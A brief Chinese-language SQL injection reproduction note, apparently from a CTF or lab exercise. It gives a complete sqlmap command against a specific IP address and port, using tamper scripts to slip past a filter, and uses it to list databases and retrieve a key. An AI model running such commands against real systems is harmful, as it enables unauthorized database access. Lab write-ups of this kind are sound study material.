漏洞复现

编码有点麻烦，这里直接使用sqlmap

这里用SQLmap进行注入，此次过滤可用sqlmap 里的tamper模块绕过，space2comment可以将空格替换成/**/; charencode对所有的payload进行url编码； equaltolike将=替换成like; 之后进行注入，如果不行出错的话可能是因为缓存的问题，使用–fresh-queries可不使用之前的缓存

sqlmap sqlmap -u "124.70.71.251:42634/new_list.php?id=1" --tamper charencode,equaltolike,space2comment --dbs --batch

步骤都一样

最后一个拿到key